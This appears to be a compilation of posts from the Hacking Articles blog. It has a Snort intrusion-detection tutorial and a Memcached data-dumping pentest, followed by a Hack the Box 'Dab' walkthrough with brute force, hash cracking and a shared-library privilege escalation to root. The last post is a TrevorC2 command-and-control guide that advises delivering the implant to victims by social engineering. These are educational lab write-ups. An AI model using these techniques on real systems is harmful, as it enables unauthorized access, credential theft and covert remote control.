Comprehensive Guide on Snort (Part 1)

This article will introduce a guide to understand IDS using Snort as an example for it.

Table of Content :

Introduction to IDS
Categories of IDS
Types of IDS
Introduction to Snort

Introduction to IDS

IDS Stands for Intrusion Detection System. The techniques and methods on which an IDS is founded on are used to monitor and reveal malicious activities both on the host and network level. Once the said activities occur then an alert is issued to aware every one of the attack. It can be hardware or software or a combination of both; depends on the requirement. An IDS use both signature or anomaly based technique together or separately; again depending on requirement. Your network topology determines where to add intrusion detection systems. Whether it should be positioned at one or more places depends on if you want to track internal threat or external threat. For instance, if you want to protect yourself from external traffic then you should place an IDS at the router and if you want to protect the inner network then place the IDS on every network segment.

Categories of IDS

Signature-Based IDS

This IDS verifies signatures of data packets in the network traffic. Basically, it finds the data packets and uses their signatures to confirm whether they are a threat or not. Such signatures are commonly known for intrusion-related signatures or anomalies related to internet protocol. Intruders such as computer viruses, etc, always have a signature, therefore, it can be easily detected by software IDS. As it uses signatures to identify the threats.

Anomaly IDS

This IDS usually detects if a data packet behaves anomaly. It issues an alert if packet anomalies are present in protocol header parts. This system produces better results in some cases than signature-based IDS. Normally such IDS captures data from the network and on these packets, it then applies the rules to it in order to detect anomalies.

Types of IDS

NIDS

NIDS stand for Network Intrusion Detection System. These types of IDS will capture data packets that were received and sent in the network and tally such packets from the database of signatures. if the packet is a match then no alert will be issued otherwise it will issue an alert letting everyone know of a malicious attack. Snort is an excellent example of a NIDS.

HIDS

HIDS stands for Host Intrusion Detection System which, obviously, acts as a host. Such types of IDS monitor system and application logs to detect intruder activity. Some IDS reacts when some malicious activity takes place, others monitor all the traffics coming to the host where IDS is installed and give alerts in real time.

Introduction to snort

Snort is a Network Intrusion Detection System (NIDS). It’s quite popular and is open source software which helps in monitor network traffic in real-time, hence it can also be considered as a packet sniffer. Basically, it examines each and every data packet in depth to see if there are any malicious payloads. it can also be used for protocol analysis and content searching. It is capable of detecting various attacks like port scans, buffer overflow, etc. It’s available for all platforms i.e. Windows, Linux, etc. It doesn’t require any recompilation with the system or hardware to added to your distribution; root privileges are required though. It inspects all the network traffic against the provided set of rules and then alerts the administration about any suspicious activity. it’s divided into multiple components and all the components work together to detect an intrusion. Following are the major components of snort :

Packet Decoder
Pre-processors
Detection Engine
Logging and Alerting System
Output Modules

Installation of Snort

First, use the ifconfig command in your Ubuntu to check the interface. As you can see the image below the interface is ens33.

Now, let’s install snort by using the following command :

sudo apt-get install snort*

1	sudo apt-get install snort*

Once the installation starts, it will ask you the interface that we previously checked. Give its name here and press enter.

Then it will ask you about your network IP. Here, you can either provide a single IP or the range of IPs as we have given below in the image :

Then possible, it will again ask you for the name of the interface, provide it again and press enter.

As the snort is installed, open the configuration file using nano or any text editor to make some changes inside. Use the following command to do so :

sudo nano /etc/snort/snort.conf

1	sudo nano /etc/snort/snort.conf

Scroll down the text file near line number 45 to specify your network for protection as shown in the given image.

#Setup the network addresses you are protecting

ipvar HOME_NET 192.168.1.21

1	ipvar HOME_NET 192.168.1.21

Now run given below command to enable IDS mode of snort :

sudo snort -A console -i ens33 -c /etc/snort/snort.conf

1	sudo snort -A console -i ens33 -c /etc/snort/snort.conf

The above command will compile the complete file and test the configuration setting automatically as shown in given below image:

Once the snort is installed and configured, we can start making changes to its rules as per our own requirement and desire. To the rules on which snort works use the following command :

cd etc/snort/rules
ls -la

1 2	cd etc/snort/rules ls -la

As shown in the image below, you can find all the documents related to rules.

Snort Rule Format

Snort offers its user to write their own rule for generating logs of Incoming/Outgoing network packets. Only they need to follow the snort rule format where packets must meet the threshold conditions. Always bear in mind that the snort rule can be written by combining two main parts “the Header” and “the Options” segment.

The header part contains information such as the action, protocol, the source IP and port, the network packet Direction operator towards the destination IP and port, the remaining will be considered in the options part.

Syntax: Action Protocol Source IP Source port -> Destination IP Destination port (options)

Header Fields:-

Action: It informs Snort what kind of action to be performed when it discovers a packet that matches the rule description. There are five existing default job actions in Snort: alert, log, pass, activate, and dynamic are keyword use to define the action of rules. You can also go with additional options which include drop, reject, and sdrop.

Protocol: After deciding the option for action in the rule, you need to describe specific Protocol (IP, TCP, UDP, ICMP, any) on which this rule will be applicable.

Source IP: This part of header describes the sender network interface from which traffic is coming.

Source Port: This part of header describes the source Port from which traffic is coming.

Direction operator (“->”, “<>”): It denotes the direction of traffic flow between sender and receiver networks.

Destination IP: This part of header describes the destination network interface in which traffic is coming for establishing the connection.

Destination Port: This part of header describes the destination Port on which traffic is coming for establishing the connection.

Option Fields:

The body for rule option is usually written between circular brackets “()” that contains keywords with their argument and separated by semicolon “;” from another keyword.

There are four major categories of rule options.

General: These options contains metadata that offers information with reference to them.

Payload: These options all come across for data contained by the packet payload and can be interconnected.

Non-payload: These options come across for non-payload data.

Post-detection: These options are rule specific triggers that happen after a rule has fired.”

General Rule Options (Metadata)

In this article are going to explore more about general rule option for beginners so that they can easily write a basic rule in snort rule file and able to analyst packet of their network. Metadata is part of the optional rule which basically contains additional information of about snort rule that is written with the help of some keywords and with their argument details.

Keyword	Description
msg	The msg keyword stands for “Message” that informs to snort that written argument should be print in logs while analyst of any packet.
reference	The reference keyword allows rules to a reference to information present on other systems available on the Internet such as CVE.
gid	The gid keyword stands for “Generator ID “which is used to identify which part of Snort create the event when a specific rule will be launched.
sid	The sid keyword stands for “Snort ID” is used to uniquely identify Snort rules.
rev	The rev keyword stands for “Revision” is used to uniquely identify revisions of Snort rules.
classtype	The classtype keyword is used to assigned classifications and priority numbers to the group and distinguish them a rule as detecting an attack that is part of a more general type of attack class. Syntax: config classification: name, description, priority number.
priority	The priority keyword to assigns a severity rank to your rules.

Let’s start writing snort rule:

To check whether the Snort is logging any alerts as proposed, add a detection rule alert on IP packets in the “local.rules file”

Before writing new rules let’s empty the ICMP rule file by using the following command :

echo "" > icmp.rules
cat icmp.rules

1 2	echo "" > icmp.rules cat icmp.rules

The cat command will confirm whether the file is empty. Now, let’s empty the icmp-info.rules :

echo "" > icmp-info.rules
cat icmp-info.rules

1 2	echo "" > icmp-info.rules cat icmp-info.rules

Now let’s write the rule :

alert icmp any any -> 192.168.1.21 any (msg: "ICMP Packet found"; sid:10000001; )

1	alert icmp any any -> 192.168.1.21 any (msg: "ICMP Packet found"; sid:10000001; )

If you observe in the image below, we have used a one-way arrow which means that snort will alert us about incoming malicious traffic :

The IP (192.168.1.10) we will attack from is shown in the image shown below :

Now, we will send two packets with the following command :

ping -n 2 192.168.1.21

1	ping -n 2 192.168.1.21

You can check the details of the packets that are being sent :

Use the following command to activate snort in order to catch the malicious packets :

sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i ens33

1	sudo snort -A console -q -u snort -g snort -c /etc/snort/snort.conf -i ens33

Here,

-A Set alert mode: fast, full, console, test or none

-q stands for Quiet, Don’t show banner and status report.

–u Run snort uid as <uname> user

-g Run snort gid as <gname> group (or gid)

-c <rules> Use Rules File

-i listen on interface

And as you can see in the image below the alerts are being issued by snort :

Now, add the following rule to see both incoming and outgoing traffic when an alert is issued :

alert icmp any any <> 192.168.1.21 any (msg: "ICMP Packet found"; sid:10000001; )

1	alert icmp any any <> 192.168.1.21 any (msg: "ICMP Packet found"; sid:10000001; )

As the below image shows in this we have used ‘<>’, it is used in order to monitor both sent and received packets when an alert is issued.

Again we will send two packets like before using the following command :

ping -n 192.168.1.21

1	ping -n 192.168.1.21

And therefore, as a result, you can see both packets as shown in the image below :

Now we will apply rules on port 21, 22 and 80. This way, whenever a suspicious packet is sent to these ports, we will be notified. Following are the rules to apply to achieve the said :

alert tcp any any -> any 21 (msg: "FTP Packet found"; sid:10000002; )
alert tcp any any -> any 22 (msg: "SSH Packet found"; sid:10000003; )
alert tcp any any -> any 80 (msg: "HTTP Packet found"; sid:10000003; )

alert tcp any any -> any 21 (msg: "FTP Packet found"; sid:10000002; )

alert tcp any any -> any 22 (msg: "SSH Packet found"; sid:10000003; )

alert tcp any any -> any 80 (msg: "HTTP Packet found"; sid:10000003; )

When the packet is sent to port 80 as shown in the image :

Snort will issue an alert of HTTP packet as its shown in the image below :

Similarly, when a data packet sent to ftp as given in the following image :

The FTP packets will be detected and one will be notified.

Again, in a similar manner, when one tries to send packets to SSH as shown in the image below :

Snort will notify the administration as shown below :

This way, using snort or any other IDS one can be protected from network attacks by being notified of them in time.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Penetration Testing on Memcached Server

In our previous article, we learned how to configure Memcached Server in Ubuntu 18.04 system to design our own pentest lab. Today we will learn multiple ways to exploit Memcached Server.

Dumping data from the Memcached server manually.
Dumping data using libmemcached-tools.
Dumping data using Metasploit.
Monitoring using Watchers.

Requirements

Target: Memcached Server running in Ubuntu 18.04 system

Attacker: Kali Linux

Let’s Begin!!

Dumping data from Memcached server manually

Boot up your Kali Linux machine and do a simple nmap scan first to check whether the target machine is running Memcached Server or not.

nmap -sV -p- 192.168.1.32

1	nmap -sV -p- 192.168.1.32

As you can see in the above image, Memcached is running in the target machine and the port 11211 is open.

Now, let’s do a little advanced search using nmap script command by typing the following command.

nmap -p11211 --script=memcached-info 192.168.1.32

1	nmap -p11211 --script=memcached-info 192.168.1.32

As you can see in the above image, nmap script command fetched us some crucial information about the Memcached server such as process ID, Uptime, Architecture, MAC Address etc.

Now, let’s try to connect the Memcached server using telnet by typing in the commands given below.

telnet 192.168.1.32 11211

1	telnet 192.168.1.32 11211

As you can see in the above image, we are able to connect the Memcached Server through telnet. In such cases, the server is unprotected, hence, an attacker can gain access to the server without any obstacle because the server is not configured with SASL or any kind of firewall. Let’s go ahead and begin exploitation of the Memcached Server of which we gained access previously.

Type in a command version to do a version scan of the Memcached Server.

version

version

The above data represents that the version of Memcached is 1.5.6 and it is running in a Ubuntu machine.

Now, let’s get straight to fetch the valuable data stored in the server. Type the command shown below to print all the general statistics of the server.

stats

stats

The above information shows the current traffic statistics. It serves the number of connections, data is stored into the cache, cache hit ratios and detailed information on the memory usage and distribution of information through the slab allocation used to store individual items.

Now, we will run another command to fetch the slab statistics. Slabs are created and allocated for storing information within the cache. Run the command shown below.

stats slabs

1	stats slabs

As you can observe in the above image, currently there is only one slab present in the server whose slab number is 1.

Now, let’s run a command mentioned below to fetch count, age, eviction, expired etc. organized by slab ID.

stats items

1	stats items

The above image gives us an insight into how the data is organized in slab ID 1.

Now, let’s run the command below to dump all the keys present in a particular slab.

stats cachedump 1 0

1	stats cachedump 1 0

Here 1 and 0 are the parameters,

1 = slab ID.

0 = It represents the number of keys you want to dump, 0 will dump all the keys present in the slab ID respectively.

The above image represents ITEM <item_key> [<item_size> b; <expiration_timestamp> s]

Now, we can simply use the get command to fetch the values stored in the keys as shown below.

get first 
get second
get third

get first

get second

get third

As you can see in the above image, we have successfully dumped the data stored in the key values.

Dumping data using libmemcached-tools

Dumping of data using this toolkit makes the work a lot easier. So, let’s start by installing libmemcached-tools in our system by typing in the following command.

apt install libmemcached-tools

1	apt install libmemcached-tools

Now that we have installed libmemcached-tools let’s start using it by typing in the following command.

memcstat --servers=192.168.1.33

1	memcstat --servers=192.168.1.33

The above command will give pretty much the same result as the stats command which we had used earlier while fetching the server statistics manually.

Now, let’s get straight to dumping the key values stored in the server. Run the command given below.

memcdump --servers=192.168.1.33

1	memcdump --servers=192.168.1.33

As you can see in the above image, we have dumped all the keys present in the server currently.

Now, let’s dump all the values stored in the keys respectively. Run the command shown below.

memccat --servers=192.168.1.33 fifth fourth third second first

1	memccat --servers=192.168.1.33 fifth fourth third second first

The above command fetched us all the data stored in the respective key values. An attacker can use libmemcached-tools to easily upload any malicious file to the server too. Here, we will be showing an example of how to upload a file in the server.

Type the command shown below.

memccp --servers=192.168.1.33 file

1	memccp --servers=192.168.1.33 file

Here, the memccp command is uploading a file named “file.txt” present in the root directory of our system. Now, let’s use memcat to view the content of the file which we have uploaded in the server.

memcat --servers=192.168.1.33 file

1	memcat --servers=192.168.1.33 file

As you can see, the above command fetched us the content of the file.

Dumping Data using Metasploit

As we all know, no exploitation is complete without using the Metasploit Framework once. So let’s dig in and see how we can exploit Memcached using Metasploit.

Fire up the Metasploit Framework and search Memcache.

search memcache

1	search memcache

The above image shows that there are currently 4 auxiliaries present in Metasploit.

We will be using auxiliary/gather/memcached_extractor to fetch the keys and the values stored in it. Run the command given below.

use auxiliary/gather/memcached_extractor

1	use auxiliary/gather/memcached_extractor

Once you have successfully imported the auxiliary in the Metasploit Framework, just set the rhost and then run the auxiliary. We know that Memcached stores data temporarily. So the above image shows that the auxiliary had fetched us both the Key and the Value currently present in the Memcached Server and stored it in its default location /root/.msf4/loot/20190218044841_default_192.168.1.35_memcached.dump_286171.txt

Monitoring using Watchers

Watchers are a way to connect to Memcached and monitor all the actions being performed internally.

Now connect the Memcached using telnet and type the command shown below.

watch fetchers

1	watch fetchers

The command line OK indicates that watcher is ready to send logs.

As you can see in the above image, all the actions which are being performed in the server are shown here live.

Conclusion

In this article, we have learned beginner level methods to exploit Memcached. In our future articles, we will be showing advanced methods to exploit Memcached Servers.

Stay tuned!!

Author: Benoy Naskar is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

Hack the Box: Dab Walkthrough

Today we are going to solve another CTF challenge “Dab”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of Dab is 10.10.10.86

Penetrating Methodology

Network scanning (Nmap)
Logging in FTP using Anonymous Login
Find Hidden file using steghide
Bruteforce Login Credential using Burpsuite
Manage Cookies using Burpsuite to get access
Bruteforce all ports using wfuzz
Retrieve version and password hashes on Memcached server
Crack password hash using John the Ripper
Bruteforce the credentials using Hydra
Logging into the server using SSH and getting user flag
Using ltrace to extract application password
Compile the remaining function using gcc
Snagging the Root Flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -sV -sC 10.10.10.86

1	nmap -sV -sC 10.10.10.86

The Nmap scan shows us that there are 4 ports open: 21(FTP), 22(SSH), 80(HTTP), 8080(HTTP)

As port 21 is open, we access it using FTP and find a JPG file. We download it to our system to find more information about the image file.

We use a tool called “steghide” to find if there is any file hidden inside the image and find a hidden text file called “dab.txt”. We extract the file and open it and find that it was a dead end.

steghide --info dab.jpg
steghide extract -sf dab.jpg -xf dab.txt

1 2	steghide --info dab.jpg steghide extract -sf dab.jpg -xf dab.txt

Now as port 80 is running HTTP, we access the web service and find a login page.

Port 8080 is also running HTTP, we try to access the web service and get an error that the authentication cookie is not set.

We try to brute force the username and password, so we capture the request of the browser using burpsuite and send it to the intruder and selected attack type “Cluster bomb” and select the parameter username and password as a target.

After selecting “rockyou.txt” as our wordlist we start the brute force and find the correct username and password to be “admin: Password1”.

We are still not able to access the web application on port 8080, as it still shows the same cookie error. So we brute-force the cookie parameter using burp suite.

After selecting “rockyou.txt” as wordlist, we find the cookie parameter is called “password”. We also get another error; stating that the password authentication cookie is incorrect.

So we again capture the request, and this time we brute force the value of password parameter.

After selecting “rockyou.txt” as our wordlist, we brute force the “password” variable and find the value to be “secret”.

Using burpsuite we change the cookie and are now able to access the web page. After accessing it we find a web application that can be used to send a command to a certain port.

We use wfuzz tool to brute force all the ports that can only be accessed internally and find port 11211 is open.

wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=hack' –H "Cookie: password=secret" --hc=500

1	wfuzz -c -z range,1-65535 -u 'http://10.10.10.86:8080/socket?port=FUZZ&cmd=hack' –H "Cookie: password=secret" --hc=500

Now port 11211 is for Memcached server, so we run version command to check the version of the Memcached server.

We find that we are successfully able to get the version of the Memcached server.

Now after getting the version of the Memcached server, we try to find all the users that are available on the web server. So we send the command “get users” to port 11211.

After running the command, we are successfully able to get username and password hashes available on the memcached server.

We copy the username and password from the web site into a text file so that we can user john the ripper to crack the hashes.

john --format=raw-md5 --show user2.txt > cracked.txt

1	john --format=raw-md5 --show user2.txt > cracked.txt

After cracking the password, we use the saved file to brute-force SSH login using hydra and find the correct credentials to be “genevieve: Princess1”.

hydra -C cracked.txt ssh://10.10.10.86 -t4

1	hydra -C cracked.txt ssh://10.10.10.86 -t4

Now we use this credential to login through SSH. After logging in we find a file called “user.txt”, when we open it we find our first flag.

ssh genevieve@10.10.10.86

1	ssh genevieve@10.10.10.86

We now find the file with suid bit set, and find an application called “myexec”.

find / -perm -4000 2>/dev/null

1	find / -perm -4000 2>/dev/null

We run the application and find that it is asking for a password.

We now use ltrace to find the password of the application.

ltrace myexec

1	ltrace myexec

Now when we give the correct password and run it with ltrace. We find that a function is missing from the application.

We find the shared library that the application is using. We check “/etc/ld.so.conf.d/test.conf” to find the location from which the preloaded library is accepted and find it is “/tmp” directory.

ldd /usr/bin/myexec
cat /etc/ld.so.conf.d/test.conf

1 2	ldd /usr/bin/myexec cat /etc/ld.so.conf.d/test.conf

Now create a C program to execute “/bin/bash” inside /tmp directory.

We compile it as a shared library.

gcc –Wall –fPIC –shared –o libseclogin.so /tmp/libseclogin.c

1	gcc –Wall –fPIC –shared –o libseclogin.so /tmp/libseclogin.c

Now we copy it inside the /tmp/ directory and cache the shared library using “ldconfig”. Then when running the application and give it the correct password we are able to spawn a bash shell as the root user. We move to /root directory and find a file called “root.txt”. We take a look at the content of the file and find the final flag.

cp libseclogin.so /tmp/
ldconfig
myexec

cp libseclogin.so /tmp/

ldconfig

myexec

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

TrevorC2 – Command and Control

TrevorC2 is command and control framework. It is a client/server model which works through a browser masquerading as C2 tool. It works on different time intervals which makes it almost impossible to be detected. This tool is coded in python but it’s also compatible with c#, PowerShell, or any other platform. this is supported by both Windows and MacOS along with Linux. It is very easy and convenient to use.

You can download it from

https://github.com/trustedsec/trevorc2

1	https://github.com/trustedsec/trevorc2

Once its downloaded, open the folder and then open trevorc2_server.py file and change the IP to your localhost IP as shown in the image below. Also, provide the site that will be cloned to the trevorc2 server.

Then, start and run trevorc2 framework.

Once the trevorc2 is up and running, change the IP to your localhost IP in trevorc2.ps1 file.

Then send this file to the victim using any desired social engineering method. Once the file is executed by the victim, you will have your session as shown in the image below :

To see the sessions type :

list

list

And to access this session type :

interact <serial number od session>

1	interact <serial number od session>

Author: Kavish Tyagi is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast. contact here

Hacking Articles

Raj Chandel's Blog